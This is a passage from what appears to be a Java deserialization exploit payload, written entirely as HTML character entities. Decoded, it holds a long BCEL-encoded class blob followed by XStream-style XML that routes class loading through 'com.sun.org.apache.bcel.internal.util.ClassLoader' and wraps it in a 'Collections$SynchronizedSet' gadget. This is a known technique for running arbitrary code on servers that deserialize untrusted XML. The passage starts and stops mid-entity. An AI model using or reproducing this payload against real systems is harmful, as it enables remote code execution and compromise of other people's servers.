x24;&#x68;&#x72;&#x4d;&#x72;&#x52;&#x4e;&#x24;&#x61;&#x33;&#x24;&#x62;&#x64;&#x24;&#x39;&#x36;&#x24;&#x47;&#x39;&#x54;&#x24;&#x45;&#x64;&#x24;&#x38;&#x61;&#x79;&#x24;&#x65;&#x31;&#x59;&#x65;&#x54;&#x24;&#x68;&#x24;&#x66;&#x37;&#x24;&#x38;&#x33;&#x24;&#x38;&#x32;&#x24;&#x68;&#x4f;&#x4c;&#x55;&#x24;&#x77;&#x24;&#x64;&#x32;&#x24;&#x37;&#x62;&#x24;&#x38;&#x66;&#x24;&#x66;&#x63;&#x57;&#x24;&#x35;&#x65;&#x24;&#x69;&#x24;&#x7a;&#x24;&#x46;&#x24;&#x65;&#x31;&#x24;&#x66;&#x37;&#x24;&#x35;&#x62;&#x24;&#x39;&#x36;&#x24;&#x75;&#x24;&#x55;&#x24;&#x65;&#x63;&#x24;&#x66;&#x32;&#x4d;&#x24;&#x59;&#x24;&#x39;&#x66;&#x24;&#x39;&#x30;&#x24;&#x64;&#x37;&#x67;&#x24;&#x38;&#x38;&#x24;&#x39;&#x36;&#x24;&#x56;&#x6c;&#x24;&#x61;&#x65;&#x24;&#x39;&#x33;&#x4c;&#x24;&#x64;&#x64;&#x24;&#x63;&#x38;&#x24;&#x70;&#x24;&#x66;&#x33;&#x24;&#x62;&#x32;&#x24;&#x63;&#x31;&#x59;&#x24;&#x61;&#x31;&#x7a;&#x24;&#x64;&#x65;&#x24;&#x63;&#x37;&#x24;&#x58;&#x24;&#x68;&#x39;&#x24;&#x39;&#x30;&#x24;&#x6b;&#x24;&#x7a;&#x24;&#x33;&#x61;&#x24;&#x62;&#x65;&#x24;&#x39;&#x64;&#x24;&#x61;&#x62;&#x24;&#x64;&#x63;&#x53;&#x4b;&#x24;&#x39;&#x62;&#x24;&#x38;&#x65;&#x24;&#x61;
&#x61;&#x24;&#x37;&#x63;&#x24;&#x78;&#x62;&#x24;&#x67;&#x24;&#x4f;&#x24;&#x38;&#x62;&#x24;&#x46;&#x61;&#x71;&#x24;&#x66;&#x34;&#x24;&#x65;&#x66;&#x24;&#x39;&#x31;&#x24;&#x64;&#x35;&#x24;&#x52;&#x24;&#x63;&#x66;&#x24;&#x39;&#x35;&#x24;&#x76;&#x24;&#x66;&#x34;&#x55;&#x79;&#x24;&#x61;&#x61;&#x24;&#x49;&#x39;&#x24;&#x38;&#x36;&#x24;&#x66;&#x34;&#x74;&#x24;&#x63;&#x30;&#x24;&#x63;&#x39;&#x24;&#x58;&#x24;&#x37;&#x64;&#x6a;&#x24;&#x4b;&#x33;&#x24;&#x63;&#x37;&#x24;&#x38;&#x36;&#x24;&#x35;&#x65;&#x24;&#x66;&#x34;&#x24;&#x63;&#x36;&#x24;&#x64;&#x31;&#x24;&#x35;&#x63;&#x76;&#x24;&#x34;&#x30;&#x24;&#x66;&#x35;&#x24;&#x61;&#x65;&#x78;&#x24;&#x64;&#x64;&#x24;&#x44;&#x24;&#x39;&#x39;&#x24;&#x38;&#x33;&#x51;&#x24;&#x79;&#x24;&#x38;&#x38;&#x41;&#x24;&#x39;&#x31;&#x24;&#x62;&#x35;&#x73;&#x24;&#x65;&#x35;&#x51;&#x24;&#x62;&#x65;&#x4b;&#x48;&#x24;&#x78;&#x24;&#x61;&#x65;&#x4a;&#x75;&#x24;&#x63;&#x36;&#x24;&#x79;&#x24;&#x38;&#x63;&#x24;&#x62;&#x32;&#x24;&#x63;&#x66;&#x24;&#x38;&#x33;&#x24;&#x39;&#x66;&#x24;&#x61;&#x36;&#x24;&#x4a;&#x24;&#x65;&#x36;&#x24;&#x65;&#x34;&#x24;&#x45;&#x24;&#x39;&#x62;&#x24;&#x65;&#x61;&#x24;&#x63;&#x31;&#x58;&#x24;&#x62;&#x61;&#x72;&#x24;&#x35;&#x62;&#x24;&#x66;&#x33;&#x24;&#x37;&#x63;&#x24;&#x66;&#x31;&#x24;&#x38;&#x33;&#x24;&#x64;&#x62;&#x73;&#x24;&#x63;&#x63;&#x33;&#x24;&#x7a;&#x24;&#x38;&#x31;&#x24;&#x38;&#x64;&#x78;&#x24;&#x38;&#x34;&#x24;&#x33;&#x66;&#x24;&#x61;&#x33;&#x24;&#x66;&#x32;&#x24;&#x61;&#x66;&#x24;&#x38;&#x31;&#x24;&#x64;&#x33;&#x24;&#x63;&#x63;&#x6b;&#x24;&#x39;&#x31;&#x24;&#x65;&#x62;&#x24;&#x57;&#x24;&#x65;&#x65;&#x24;&#x39;&#x32;&#x24;&#x37;&#x63;&#x72;&#x24;&#x63;&#x30;&#x24;&#x52;&#x24;&#x65;&#x39;&#x24;&#x62;&#x39;&#x24;&#x47;&#x24;&#x65;&#x35;&#x6a;&#x70;&#x24;&#x69;&#x24;&#x65;&#x37;&#x24;&#x64;&#x61;&#x24;&#x59;&#x24;&#x49;&#x24;&#x39;&#x62;&#x24;&#x64;&#x30;&#x24;&#x63;&#x64;&#x24;&#x64;&#x35;&#x24;&#x75;&#x24;&#x44;&#x24;&#x64;&#x30;&#x24;&#x38;&#x33;&#x24;&#x61;&#x64;&#x24;&#x37;&#x63;&#x6a;&#x24;&#x64;&#x38;&#x24;&#x62;&#x36;&#
x24;&#x61;&#x38;&#x24;&#x61;&#x63;&#x24;&#x64;&#x63;&#x24;&#x6f;&#x4e;&#x24;&#x61;&#x37;&#x24;&#x65;&#x63;&#x24;&#x39;&#x66;&#x24;&#x65;&#x62;&#x68;&#x24;&#x75;&#x24;&#x6e;&#x24;&#x55;&#x24;&#x4e;&#x24;&#x39;&#x37;&#x24;&#x51;&#x39;&#x24;&#x64;&#x34;&#x24;&#x54;&#x6d;&#x24;&#x4d;&#x24;&#x64;&#x64;&#x24;&#x38;&#x34;&#x5a;&#x24;&#x38;&#x32;&#x24;&#x39;&#x36;&#x24;&#x64;&#x65;&#x24;&#x61;&#x61;&#x24;&#x66;&#x30;&#x24;&#x61;&#x64;&#x24;&#x61;&#x39;&#x24;&#x45;&#x24;&#x37;&#x64;&#x64;&#x24;&#x35;&#x62;&#x24;&#x4a;&#x24;&#x63;&#x64;&#x24;&#x72;&#x24;&#x59;&#x24;&#x64;&#x31;&#x24;&#x39;&#x36;&#x24;&#x53;&#x56;&#x24;&#x38;&#x64;&#x24;&#x66;&#x36;&#x24;&#x53;&#x24;&#x64;&#x37;&#x24;&#x64;&#x61;&#x4b;&#x51;&#x24;&#x35;&#x62;&#x24;&#x77;&#x24;&#x69;&#x24;&#x65;&#x33;&#x24;&#x37;&#x62;&#x73;&#x74;&#x75;&#x45;&#x24;&#x70;&#x24;&#x56;&#x24;&#x38;&#x39;&#x45;&#x62;&#x24;&#x65;&#x31;&#x24;&#x38;&#x61;&#x24;&#x64;&#x32;&#x5f;&#x24;&#x38;&#x38;&#x24;&#x61;&#x36;&#x24;&#x67;&#x63;&#x24;&#x38;&#x64;&#x24;&#x64;&#x31;&#x24;&#x66;&#x36;&#x24;&#x53;&#x24;&#x64;&#x36;&#x48;&#x24;&#x66;&#x64;&#x68;&#x47;&#x24;&#x39;&#x38;&#x24;&#x61;&#x38;&#x24;&#x65;&#x33;&#x24;&#x61;&#x31;&#x24;&#x65;&#x38;&#x24;&#x64;&#x61;&#x24;&#x38;&#x63;&#x24;&#x38;&#x34;&#x24;&#x61;&#x61;&#x31;&#x75;&#x24;&#x68;&#x24;&#x46;&#x4d;&#x24;&#x55;&#x74;&#x66;&#x24;&#x43;&#x24;&#x66;&#x38;&#x24;&#x64;&#x61;&#x24;&#x39;&#x34;&#x24;&#x66;&#x36;&#x24;&#x33;&#x62;&#x24;&#x62;&#x61;&#x24;&#x38;&#x65;&#x5f;&#x47;&#x24;&#x79;&#x24;&#x61;&#x36;&#x24;&#x39;&#x35;&#x24;&#x62;&#x30;&#x24;&#x61;&#x65;&#x24;&#x38;&#x34;&#x24;&#x66;&#x35;&#x24;&#x64;&#x37;&#x24;&#x62;&#x30;&#x24;&#x6e;&#x7a;&#x5f;&#x24;&#x4a;&#x24;&#x66;&#x37;&#x24;&#x61;&#x37;&#x24;&#x39;&#x61;&#x62;&#x24;&#x38;&#x64;&#x31;&#x24;&#x64;&#x61;&#x24;&#x37;&#x63;&#x24;&#x65;&#x30;&#x24;&#x53;&#x24;&#x39;&#x61;&#x24;&#x65;&#x35;&#x24;&#x66;&#x33;&#x24;&#x63;&#x31;&#x24;&#x78;&#x24;&#x38;&#x38;&#x44;&#x37;&#x24;&#x64;&#x32;&#x24;&#x65;&#x65;&#x24;&#x56;&#x68;&#x24;&#x38;&#x3
7;&#x7a;&#x4a;&#x78;&#x24;&#x66;&#x38;&#x6a;&#x24;&#x39;&#x30;&#x24;&#x65;&#x33;&#x24;&#x4e;&#x24;&#x66;&#x63;&#x24;&#x63;&#x31;&#x24;&#x5f;&#x24;&#x38;&#x31;&#x50;&#x24;&#x63;&#x30;&#x24;&#x63;&#x30;&#x30;&#x56;&#x24;&#x48;&#x24;&#x62;&#x39;&#x24;&#x68;&#x68;&#x41;&#x24;&#x74;&#x56;&#x24;&#x39;&#x31;&#x24;&#x63;&#x30;&#x56;&#x24;&#x71;&#x24;&#x64;&#x30;&#x24;&#x38;&#x36;&#x24;&#x39;&#x64;&#x24;&#x39;&#x34;&#x24;&#x61;&#x37;&#x24;&#x66;&#x38;&#x24;&#x62;&#x31;&#x71;&#x24;&#x51;&#x24;&#x65;&#x64;&#x24;&#x39;&#x38;&#x24;&#x63;&#x30;&#x24;&#x67;&#x24;&#x39;&#x38;&#x24;&#x65;&#x38;&#x24;&#x34;&#x30;&#x24;&#x52;&#x6b;&#x79;&#x6d;&#x77;&#x24;&#x65;&#x32;&#x32;&#x24;&#x33;&#x66;&#x24;&#x76;&#x6e;&#x24;&#x36;&#x30;&#x24;&#x33;&#x64;&#x24;&#x61;&#x64;&#x24;&#x63;&#x34;&#x70;&#x24;&#x54;&#x24;&#x65;&#x62;&#x24;&#x66;&#x30;&#x37;&#x36;&#x24;&#x45;&#x24;&#x4d;&#x24;&#x65;&#x36;&#x24;&#x64;&#x31;&#x4c;&#x24;&#x33;&#x62;&#x24;&#x62;&#x66;&#x24;&#x61;&#x30;&#x24;&#x39;&#x37;&#x24;&#x57;&#x24;&#x51;&#x24;&#x65;&#x30;&#x24;&#x39;&#x32;&#x24;&#x64;&#x38;&#x4e;&#x24;&#x38;&#x66;&#x24;&#x68;&#x79;&#x24;&#x63;&#x37;&#x24;&#x65;&#x65;&#x24;&#x63;&#x30;&#x24;&#x61;&#x33;&#x24;&#x65;&#x34;&#x24;&#x33;&#x63;&#x24;&#x63;&#x31;&#x24;&#x39;&#x62;&#x24;&#x37;&#x63;&#x24;&#x74;&#x24;&#x33;&#x66;&#x24;&#x38;&#x62;&#x42;&#x24;&#x62;&#x34;&#x24;&#x37;&#x64;&#x24;&#x42;&#x24;&#x38;&#x66;&#x53;&#x24;&#x57;&#x24;&#x61;&#x36;&#x24;&#x48;&#x24;&#x58;&#x4f;&#x24;&#x51;&#x24;&#x58;&#x24;&#x61;&#x31;&#x24;&#x39;&#x66;&#x53;&#x78;&#x24;&#x53;&#x4f;&#x24;&#x39;&#x31;&#x24;&#x65;&#x64;&#x24;&#x6f;&#x24;&#x47;&#x24;&#x62;&#x31;&#x24;&#x38;&#x62;&#x32;&#x24;&#x39;&#x35;&#x24;&#x66;&#x65;&#x24;&#x62;&#x36;&#x24;&#x54;&#x24;&#x64;&#x62;&#x24;&#x63;&#x37;&#x7a;&#x24;&#x35;&#x63;&#x24;&#x61;&#x36;&#x24;&#x63;&#x35;&#x24;&#x64;&#x64;&#x78;&#x24;&#x39;&#x61;&#x24;&#x64;&#x35;&#x24;&#x62;&#x61;&#x49;&#x24;&#x61;&#x64;&#x24;&#x33;&#x64;&#x78;&#x24;&#x38;&#x36;&#x24;&#x33;&#x65;&#x24;&#x66;&#x36;&#x24;&#x66;&#x32;&#x24;
&#x66;&#x66;&#x34;&#x24;&#x63;&#x32;&#x24;&#x62;&#x37;&#x24;&#x66;&#x31;&#x24;&#x78;&#x74;&#x24;&#x56;&#x24;&#x66;&#x64;&#x24;&#x77;&#x24;&#x66;&#x36;&#x24;&#x61;&#x39;&#x24;&#x59;&#x50;&#x31;&#x24;&#x59;&#x24;&#x61;&#x63;&#x24;&#x37;&#x63;&#x24;&#x6c;&#x24;&#x4b;&#x24;&#x64;&#x36;&#x61;&#x24;&#x56;&#x24;&#x63;&#x66;&#x42;&#x24;&#x65;&#x31;&#x24;&#x65;&#x65;&#x36;&#x24;&#x38;&#x33;&#x24;&#x62;&#x39;&#x24;&#x58;&#x24;&#x61;&#x65;&#x24;&#x6e;&#x24;&#x64;&#x38;&#x24;&#x4e;&#x24;&#x64;&#x66;&#x66;&#x24;&#x33;&#x63;&#x24;&#x39;&#x30;&#x4a;&#x24;&#x66;&#x62;&#x24;&#x63;&#x33;&#x54;&#x24;&#x33;&#x61;&#x24;&#x51;&#x74;&#x24;&#x63;&#x63;&#x24;&#x63;&#x31;&#x24;&#x66;&#x66;&#x24;&#x41;&#x24;&#x54;&#x24;&#x62;&#x35;&#x6c;&#x24;&#x37;&#x65;&#x24;&#x64;&#x37;&#x24;&#x4a;&#x24;&#x41;&#x24;&#x41;&#x0a;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#
x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x32;&#x63;&#x65;&#x72;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x68;&#x61;&#x73;&#x68;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x20;&#x64;&#x65;&#x66;&#x69;&#x6e;&#x65;&#x64;&#x2d;&#x69;&#x6e;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x6c;&#x61;&#x6e;&#x67;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x2
e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x69;&#x6e;&#x63;&#x69;&#x70;&#x61;&#x6c;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x3c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x22;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6a;&#x61;
&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x73;&#x65;&#x74;&#x22;&#x3e;&#x3c;&#x2f;&#x63;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x75;&#x74;&#x65;&#x78;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x22;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x22;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x3e;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x74;&#x69;&#x76;&#
x65;&#x4c;&#x69;&#x62;&#x72;&#x61;&#x72;&#x69;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x4c;&#x6f;&#x63;&#x6b;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x6
